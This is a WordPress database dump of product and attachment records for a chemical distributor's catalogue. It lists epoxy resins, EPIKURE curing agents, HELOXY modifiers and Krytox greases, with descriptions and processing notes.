INSERT INTO `wp_posts` VALUES (1042, 3, '2016-08-30 14:41:18', '2016-08-30 14:41:18', '', 'EPI-REZ™ WD 510', 'EPI-REZResin W D-510 is a liquid, bisphenol A type epoxy resin specifically designed for water dilution. In combination with epoxy curing agents and dilution with water it forms resin in water emulsions. It is useful as a modifier for Portland Cement, concrete, mortars, stuccos, and grouts. As a binder it is useful for trowel applied floor toppings, bond coats, base coats, membranecoatings and sealers. EPI-REZ WD-510 forms uniform dispersions in water in combination with Aliphatic amine curing agents, including adducts, amidoamines, polyamides, and accelerated amines.', 'publish', 'open', 'closed', '', 'epi-rez-wd-510', '', '', '2016-08-30 14:41:18', '2016-08-30 14:41:18', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1042', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1043, 3, '2016-08-30 14:40:43', '2016-08-30 14:40:43', '', 'WD 510', '', 'inherit', 'open', 'closed', '', 'wd-510', '', '', '2016-08-30 14:40:43', '2016-08-30 14:40:43', '', 1042, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/WD-510.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1044, 2, '2016-08-30 14:41:47', '2016-08-30 14:41:47', '', 'Krytox TS4', '', 'inherit', 'open', 'closed', '', 'krytox-ts4-threaded-pipe', '', '', '2016-09-28 13:35:59', '2016-09-28 13:35:59', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-ts4-threaded-pipe.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1046, 3, '2016-08-30 14:53:37', '2016-08-30 14:53:37', '', 'EPIKURE 3000 series', '', 'inherit', 'open', 'closed', '', 'epikure-3000-series', '', '', '2016-08-30 14:53:37', '2016-08-30 14:53:37', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-3000-series.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1047, 2, '2016-08-30 14:53:39', '2016-08-30 14:53:39', '', 'krytox-bearing-grease1', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease1', '', '', '2016-08-30 14:53:39', '2016-08-30 14:53:39', '', 1002, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1048, 2, '2016-08-30 14:53:56', '2016-08-30 14:53:56', '', 'krytox-bearing-grease2', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease2', '', '', '2016-08-30 14:53:56', '2016-08-30 14:53:56', '', 1002, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1049, 2, '2016-08-30 14:54:10', '2016-08-30 14:54:10', '', 'krytox-bearing-grease3', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease3', '', '', '2016-08-30 14:54:10', '2016-08-30 14:54:10', '', 1002, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1050, 2, '2016-08-30 14:54:19', '2016-08-30 14:54:19', '', 'krytox-bearing-grease4', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease4', '', '', '2016-08-30 14:54:19', '2016-08-30 14:54:19', '', 1002, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1051, 2, '2016-08-30 14:54:32', '2016-08-30 14:54:32', '', 'Krytox XP 2A5', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease5', '', '', '2016-10-07 17:59:55', '2016-10-07 17:59:55', '', 1002, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease5.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1052, 2, '2016-08-30 14:54:46', '2016-08-30 14:54:46', '', 'krytox-bearing-grease6', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease6', '', '', '2016-08-30 14:54:46', '2016-08-30 14:54:46', '', 1002, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease6.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1053, 3, '2016-08-30 15:15:56', '2016-08-30 15:15:56', '', 'EPIKURE 3100 marine', '', 'inherit', 'open', 'closed', '', 'epikure-3100-marine', '', '', '2016-08-30 15:15:56', '2016-08-30 15:15:56', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-3100-marine.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1054, 3, '2016-08-30 15:22:12', '2016-08-30 15:22:12', '', 'EPIKURE 3200 series', '', 'inherit', 'open', 'closed', '', 'epikure-3200-series', '', '', '2016-08-30 15:22:12', '2016-08-30 15:22:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-3200-series.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1055, 3, '2016-08-30 15:26:08', '2016-08-30 15:26:08', '', 'EPIKURE 3300', '', 'inherit', 'open', 'closed', '', 'epikure-3300', '', '', '2016-08-30 15:26:08', '2016-08-30 15:26:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-3300-.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1056, 2, '2016-08-30 15:30:04', '2016-08-30 15:30:04', '', 'krytox-bearing-grease155', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease155', '', '', '2016-08-30 15:30:04', '2016-08-30 15:30:04', '', 1015, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease155.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1057, 2, '2016-08-30 15:30:14', '2016-08-30 15:30:14', '', 'krytox-bearing-grease234', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-grease234', '', '', '2016-08-30 15:30:14', '2016-08-30 15:30:14', '', 1015, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-grease234.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1058, 3, '2016-08-30 15:30:33', '2016-08-30 15:30:33', '', 'EPIKURE W', '', 'inherit', 'open', 'closed', '', 'epikure-w', '', '', '2016-08-30 15:30:33', '2016-08-30 15:30:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-W.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1059, 3, '2016-08-30 15:41:43', '2016-08-30 15:41:43', 'The EPIKOTE™ Resin 862/ EPIKURE W Aromatic Amine Curing Agent system consists of a bisphenol-F epoxy resin and an aromatic amine for fabricating composite parts using resin transfer molding (RTM) or filament winding. EPIKURE Curing Agent W does not contain methylene dianiline (MDA) but is an Aromatic Amine Curing Agent which has l ow viscosity and very long working life at room temperature making this system versatile and easy to process. EPIKURE Curing Agent 537 may be utilized to decrease the gel time of the system with little or no effect on mechanical properties.\r\n\r\n<strong>Composite fabrication- Resin Transfer Molding RTM</strong>\r\n\r\nThe low viscosity feature of the EPIKOTE Resin 862 / EPIKURE W Curing Agent  resin system permits low injection pressures, less fiber washout, high filler/fiber loading, and lower mold costs for RTM fabrication processes. An ambient temperature, one-pot, RTM process may be employed in which the mixed resin/curing agent increases from 2200 cP initially to 5000 cP after about 36 hours. Alternatively, a two-pot resin and curing  agent system can be used in which either the resin or both pots may be heated, generally less then 60 °C (140 °F) unless otherwise required. A typical process includes injecting into a heated mold at 121 °C (250 °F). The system viscosity at this temperature is on the order of 10 cP. Following the resin injection, the system should be cured in the mold for between 0.5-1.5 hours at 177 °C (350 °F) followed by a 177 °C (350 °F) post-cure for another hour. Molding and postcure temperatures and times can be modified for optimum production.\r\n\r\n<strong>Composite fabrication — filament winding</strong>\r\n\r\nThe low viscosity and long room temperature pot life of the EPIKOTE Resin 862 / EPIKURE W Curing Agent resin system make it suitable for use in wet filament winding applications.The material may be used at room temperature or heated to reduce viscosity and facilitate fiber wetout. The initial mixed system viscosity of 2200 cP may be reduced to approximately 1000 cP by heating the system to about 40 °C (100 °F). The pot life at this temperature is in excess of 8 hours, sufficient for winding large or complex parts. EPIKOTE Resin 862/EPIKURE Curing Agent W is suitable for use with glass, carbon, and aramid reinforcements. If air entrainment during mixing or fiber impregnation proves to be a problem, air release agents, such as BYK™ A-501* or equivalent, may be added. Cure may be conducted through internal heat sources in the mandrel or externally with ovens or both. Additional resin/reinforcement compaction may be accomplished during cure using traditional vacuum and pressure techniques. Frequently, a staged cure is most desirable in order to minimize resin runout and void formation in the composite. If\r\nshrinkwrap, vacuum bagging, or other external containment is not utilized, it is recommended that the part be rotated during cure to ensure uniform resin distribution through the part. A suggested cure cycle would include 1 hour at 121 °C (250 °F) plus 2.5 hours at 177 °C (350 °F).\r\n\r\n&nbsp;\r\n\r\nMiller-Stephenson is an Epikure W and EPON Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPIKURE™ W', 'The EPIKOTE™ Resin 862/EPIKURE™ Curing Agent W system consists of a bisphenol-F epoxy resin and an aromatic amine for fabricating composite parts using resin transfer molding (RTM) or filament winding. EPIKURE Curing Agent W does not contain methylene dianiline (MDA). Low viscosity and very long working life at room temperature\r\nmake this system versatile and easy to process. EPIKURE Curing Agent 537 may be utilized to decrease the gel time of the system with little or no effect on mechanical properties. Benefits include:\r\n<ul>\r\n 	<li>Low room temperature viscosity (about 2200 cP)</li>\r\n 	<li>Long working life (&gt;20 hrs.)</li>\r\n 	<li>Low moisture absorption (2-2.5 wt%)</li>\r\n 	<li>Good epoxy performance characteristics</li>\r\n 	<li>Non-MDA aromatic amine</li>\r\n 	<li>High elongation</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-w', '', '', '2016-11-23 19:46:57', '2016-11-23 19:46:57', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1059', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1060, 3, '2016-08-30 15:41:15', '2016-08-30 15:41:15', '', 'W', '', 'inherit', 'open', 'closed', '', 'w', '', '', '2016-08-30 15:41:15', '2016-08-30 15:41:15', '', 1059, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/W.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1061, 3, '2016-08-30 15:50:22', '2016-08-30 15:50:22', '', 'EPIKURE™ 3370', 'EPIKURE™ Curing Agent 3370 is a low viscosity, modified cycloaliphatic amine capable of effecting thorough cures in epoxy resin systems at normal room temperature. Applications include industrial and chemical resistane floor toppings, light colored casting, and tank lining application. Benefits include:\r\n<ul>\r\n 	<li>Good overnight cure development</li>\r\n 	<li>Moderate resistance to blush or "sweat-out"</li>\r\n 	<li>High degree of chemical resistance</li>\r\n 	<li>Light color</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3370', '', '', '2016-09-23 17:26:45', '2016-09-23 17:26:45', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1061', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1062, 3, '2016-08-30 15:46:16', '2016-08-30 15:46:16', '', '3370', '', 'inherit', 'open', 'closed', '', '3370', '', '', '2016-08-30 15:46:16', '2016-08-30 15:46:16', '', 1061, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/3370.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1063, 3, '2016-08-30 16:56:40', '2016-08-30 16:56:40', '', 'EPIKURE™ 3270', 'EPIKURE™ Curing Agent 3270, a modified aliphatic amine, is designed to rapidly cure thin sections of epoxy resin formulations at temperatures of 60 °F (15 °C) and above. EPIKURE 3270 is of special interest for decorative flooring and high-build coating applications because 100 percent reactive formulations of this type cure rapidly to clear, tough, mar-resistant films over a wide ambient temperature and relative humidity range. High-build floor coatings have been applied in one day and opened to traffic after an overnight cure period. Additionally, EPIKURE Curing Agent 3270 is well suited for fast setting equal volume adhesives. Benefits include:\r\n<ul>\r\n 	<li>Light color</li>\r\n 	<li>Good mar resistance</li>\r\n 	<li>Resistance to amine carbonate formation (“blush”, “bloom” or “sweat-out”)</li>\r\n 	<li>Convenient combining ratio</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3270', '', '', '2016-09-23 17:23:42', '2016-09-23 17:23:42', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1063', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1064, 3, '2016-08-30 16:56:09', '2016-08-30 16:56:09', '', '3270', '', 'inherit', 'open', 'closed', '', '3270', '', '', '2016-08-30 16:56:09', '2016-08-30 16:56:09', '', 1063, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/3270.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1065, 3, '2016-08-30 17:04:07', '2016-08-30 17:04:07', '', 'EPIKURE™ 3155', 'EPIKURE Curing Agent 3155 is a low viscosity, modified polyamide epoxy curing agent based on dimerized fatty acid and polyamines. The low viscosity of EPIKURE Curing Agent 3155 allows formulation of products with high levels of pigmentation and use of little or no solvent, depending on end use application. It is well-suited for use in higher solids coating formulations where low volatile organic content (VOC) compliance is required. Benefits include:\r\n<ul>\r\n 	<li>Good corrosion/chemical resistance</li>\r\n 	<li>Good flexibility</li>\r\n 	<li>Superior epoxy resin compatibility</li>\r\n 	<li>Long pot life</li>\r\n 	<li>Good blush resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3155', '', '', '2016-09-23 17:24:38', '2016-09-23 17:24:38', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1065', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1066, 3, '2016-08-30 17:03:33', '2016-08-30 17:03:33', '', '3155', '', 'inherit', 'open', 'closed', '', '3155', '', '', '2016-08-30 17:03:33', '2016-08-30 17:03:33', '', 1065, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/3155.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1067, 3, '2016-08-30 17:16:21', '2016-08-30 17:16:21', '', 'EPIKURE™ 3015', 'EPIKURE™ Curing Agent 3015 is a low viscosity amidoamine, low imidazoline content, fastsetting epoxy curing agent based on tall oil fatty acid and polyamines. Applications include electrical encapsulation, adhesives, grout, castings, concrete repair, and river rock mortars.  Benefits include:\r\n<ul>\r\n 	<li>Good adhesion</li>\r\n 	<li>Good chemical resistance</li>\r\n 	<li>Low exotherm</li>\r\n 	<li>Low viscosity</li>\r\n 	<li>High filler loading</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3015', '', '', '2016-09-23 17:25:50', '2016-09-23 17:25:50', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1067', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1068, 3, '2016-08-30 17:15:43', '2016-08-30 17:15:43', '', '3015', '', 'inherit', 'open', 'closed', '', '3015', '', '', '2016-08-30 17:15:43', '2016-08-30 17:15:43', '', 1067, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/3015.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1069, 3, '2016-08-30 17:29:58', '2016-08-30 17:29:58', 'HELOXY 61 is <span class="GramE">a commercial</span> grade butyl glycidyl ether. A low viscosity, virtually colorless monoepoxide, it is widely used in the viscosity reducing modification of epoxy resin formulations.\r\n\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>\r\n<div class="Section1">Most efficient epoxy resin viscosity reduction of all common epoxy functional modifiers</div></li>\r\n 	<li>\r\n<div class="Section1">Outstanding substrate and filler wetting characteristics</div></li>\r\n 	<li>\r\n<div class="Section1">Excellent retention of physical strength and thermal properties of base formulations</div></li>\r\n</ul>\r\n<strong>General Information</strong>\r\n\r\nThe relatively low molecular weight of HELOXY 61 makes it the most efficient common monoepoxide in reducing the viscosity of basic epoxy resin formulations. As with any monoepoxide, modification of basic epoxy resins with HELOXY 61 reduces the average functionality of the mixture thereby lowering overall cured state performance. However, due to its excellent viscosity reduction characteristics, relatively low levels of HELOXYModifiers are normally needed to attain desired viscosity reductions and these compromises in performance properties are held to a minimum. In any application, the amount of HELOXY 61 used in the formulation should be limited to that necessary to yield the required viscosity reduction. The maximum recommended quantity of  this Epoxy Functional Modifier is about 20 percent by weight of the resin portion.\r\n\r\nThis Epoxy Resin Modifier is compatible with other epoxy resins in all proportions and is easily blended with liquid resins at room temperature. If preferred, a pre-blend of HELOXY 61 and a standard bisphenol <span class="GramE">A</span> based liquid epoxy resin at a viscosity selected for easy handling is available as EPON™ Resin 815C. For information on properties and suggested uses of this resin, please consult the appropriate product literature.\r\n\r\nCuring agents that are recommended for unmodified basic liquid epoxy resins can also be used with compositions containing HELOXY 61. When calculating the proper stoichiometric amount of curing agent to be used with HELOXY 61 modified resins, differences in epoxy content of the resin resulting from this modification are small and can generally be ignored at modification levels below 10 parts per hundred <span class="GramE">resin</span> (phr).\r\n\r\nUnless excessive amounts of HELOXY 61 are used, the physical properties of the cured systems are not seriously affected at room temperature. However, physical and electrical properties at elevated temperatures may be reduced considerably\r\n\r\nMiller-Stephenson is an Epon, Epikure, EPONEX, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'HELOXY™ 61', 'HELOXY™ Modifier 61 is a commercial grade butyl glycidyl ether. A low viscosity, virtually colorless monoepoxide, it is widely used in the viscosity reducing modification of epoxy resin formulations. The relatively low molecular weight of HELOXY 61 makes it the most efficient common monoepoxide in reducing the viscosity of basic epoxy resin formulations. However, due to its excellent viscosity reduction characteristics, relatively low levels of HELOXY 61 are normally needed to attain desired viscosity reductions and these compromises in performance properties are held to a minimum. Benefits include:\r\n<ul>\r\n 	<li>Most efficient epoxy resin viscosity reduction of all common epoxy functional modifiers</li>\r\n 	<li>Outstanding substrate and filler wetting characteristics</li>\r\n 	<li>Excellent retention of physical strength and thermal properties of base formulations</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'heloxy-61', '', '', '2016-11-07 20:19:08', '2016-11-07 20:19:08', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1069', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1070, 3, '2016-08-30 17:22:13', '2016-08-30 17:22:13', '', 'HELOXY aliphatic ether', '', 'inherit', 'open', 'closed', '', 'heloxy-aliphatic-ether', '', '', '2016-08-30 17:22:13', '2016-08-30 17:22:13', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/HELOXY-aliphatic-ether.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1071, 3, '2016-08-30 17:24:32', '2016-08-30 17:24:32', '', 'HELOXY aromatic ether', '', 'inherit', 'open', 'closed', '', 'heloxy-aromatic-ether', '', '', '2016-08-30 17:24:32', '2016-08-30 17:24:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/HELOXY-aromatic-ether.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1072, 2, '2016-08-30 17:35:34', '2016-08-30 17:35:34', '', 'AGL 683', 'Krytox AGL 683 grease contains extreme pressure and anticorrosion additives for applications in corrosive atmospheres or with significant shock loading where an element experiences greater mixed film or boundary lubrication than full film or hydrodynamic lubrication. Krytox AGL 683 grease will also provide superior performance in applications prone to significant fretting corrosion.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-agl-683', '', '', '2017-02-24 19:24:47', '2017-02-24 19:24:47', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1072', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1073, 3, '2016-08-30 17:28:25', '2016-08-30 17:28:25', '', 'heloxy 61', '', 'inherit', 'open', 'closed', '', 'heloxy-61', '', '', '2016-08-30 17:28:25', '2016-08-30 17:28:25', '', 1069, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/heloxy-61.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1074, 3, '2016-08-30 17:29:37', '2016-08-30 17:29:37', '', 'heloxy overview new', '', 'inherit', 'open', 'closed', '', 'heloxy-overview-new', '', '', '2016-08-30 17:29:37', '2016-08-30 17:29:37', '', 1069, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/heloxy-overview-new.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1075, 2, '2016-08-30 17:34:29', '2016-08-30 17:34:29', '', 'gearbox-grease-krytox', '', 'inherit', 'open', 'closed', '', 'gearbox-grease-krytox', '', '', '2016-08-30 17:34:29', '2016-08-30 17:34:29', '', 1072, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/gearbox-grease-krytox.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1076, 2, '2016-08-30 17:37:09', '2016-08-30 17:37:09', '', 'krytox-other-grease-oil', '', 'inherit', 'open', 'closed', '', 'krytox-other-grease-oil', '', '', '2016-08-30 17:37:09', '2016-08-30 17:37:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-other-grease-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1077, 2, '2016-08-30 17:49:34', '2016-08-30 17:49:34', '', 'TM7', 'Krytox TM7 grease is specifically designed for the lubrication of segmented molds, both electrically and steam-heated, in the vulcanization process of rubber tire manufacturing. This lubricant eliminates carbon residue buildup on the molds associated with hydrocarbon and hydrocarbon-based synthetic greases. They exhibit excellent adhesion, allowing the operator to significantly increase production by extending lubrication intervals. The TM7 will last in excess of 5000 cycles, based on average curing times, without re-lubrication.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n\r\n', 'publish', 'closed', 'closed', '', 'tm7', '', '', '2017-02-24 19:25:34', '2017-02-24 19:25:34', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1077', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1078, 3, '2016-08-30 17:46:00', '2016-08-30 17:46:00', '', 'PTFE release agent Miller-Stephenson', '', 'inherit', 'open', 'closed', '', 'ptfe-release-agent-miller-stephenson', '', '', '2016-08-30 17:46:00', '2016-08-30 17:46:00', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/PTFE-release-agent-Miller-Stephenson.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1079, 2, '2016-08-30 17:48:36', '2016-08-30 17:48:36', '', 'krytox-tm7-grease', '', 'inherit', 'open', 'closed', '', 'krytox-tm7-grease', '', '', '2016-08-30 17:48:36', '2016-08-30 17:48:36', '', 1077, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-tm7-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1080, 2, '2016-08-30 18:01:54', '2016-08-30 18:01:54', '', 'Krytox GPL 100', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease', '', '', '2016-10-04 14:49:51', '2016-10-04 14:49:51', '', 421, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1081, 2, '2016-08-30 18:02:05', '2016-08-30 18:02:05', '', 'Krytox GPL 101', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease1', '', '', '2016-10-04 14:57:47', '2016-10-04 14:57:47', '', 421, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1082, 2, '2016-08-30 18:02:19', '2016-08-30 18:02:19', '', 'Krytox GPL 102', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease2', '', '', '2016-10-04 14:59:20', '2016-10-04 14:59:20', '', 421, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1083, 2, '2016-08-30 18:02:32', '2016-08-30 18:02:32', '', 'Krytox GPL 103', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease3', '', '', '2016-10-04 15:08:09', '2016-10-04 15:08:09', '', 421, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1084, 2, '2016-08-30 18:02:48', '2016-08-30 18:02:48', '', 'Krytox GPL 104', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease4', '', '', '2016-10-04 15:09:11', '2016-10-04 15:09:11', '', 421, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1085, 2, '2016-08-30 18:03:04', '2016-08-30 18:03:04', '', 'Krytox GPL 105', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease5', '', '', '2016-10-04 15:10:28', '2016-10-04 15:10:28', '', 421, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1086, 2, '2016-08-30 18:27:51', '2016-08-30 18:27:51', '', 'Krytox GPL 106', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-oil-grease-pfpe', '', '', '2016-10-04 15:12:00', '2016-10-04 15:12:00', '', 441, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-oil-grease-pfpe.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1087, 2, '2016-08-30 18:28:05', '2016-08-30 18:28:05', '', 'Krytox GPL 107', '', 'inherit', 'open', 'closed', '', 'krytox-pfpe-oil-grease-gpl', '', '', '2016-10-04 15:13:21', '2016-10-04 15:13:21', '', 441, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-pfpe-oil-grease-gpl.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1088, 2, '2016-08-30 19:06:13', '2016-08-30 19:06:13', 'Some applications require electrical conductivity. Most greases act as insulators. This special grade of Krytox GPL 246 has been formulated with copper powder in grease to act as a conductor of electricity.\r\n\r\nKrytox oils provide long life and high-temperature stability and lubrication. The addition of copper powder also improves the thermal conductivity of the grease for applications where improved heat transfer is needed; however, it can increase bearing noise and wear. Because GPL 246 is formulated with our Krytox GPL 106 base oil, it retains many of the properties of that oil. ', 'GPL 246', 'Some applications require electrical conductivity. Most greases act as insulators. This special grade of Krytox has been formulated with copper powder in grease to act as a conductor of electricity. Krytox oils provide long life and high-temperature stability and lubrication. The addition of copper powder also improves the thermal conductivity of the grease for applications where improved heat transfer is needed; however, it can increase bearing noise and wear. Because GPL 246 is formulated with our Krytox GPL 106 base oil, it retains many of the properties of that oil.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-gpl-246', '', '', '2016-10-04 15:16:25', '2016-10-04 15:16:25', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1088', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1089, 2, '2016-08-30 19:03:44', '2016-08-30 19:03:44', '', 'Krytox GPL 246', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-grease', '', '', '2016-10-04 15:15:59', '2016-10-04 15:15:59', '', 1088, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1090, 3, '2016-08-30 19:10:10', '2016-08-30 19:10:10', '', 'ReleaSys semi-permanent mold release', '', 'inherit', 'open', 'closed', '', 'releasys-semi-permanent-mold-release', '', '', '2016-08-30 19:12:31', '2016-08-30 19:12:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
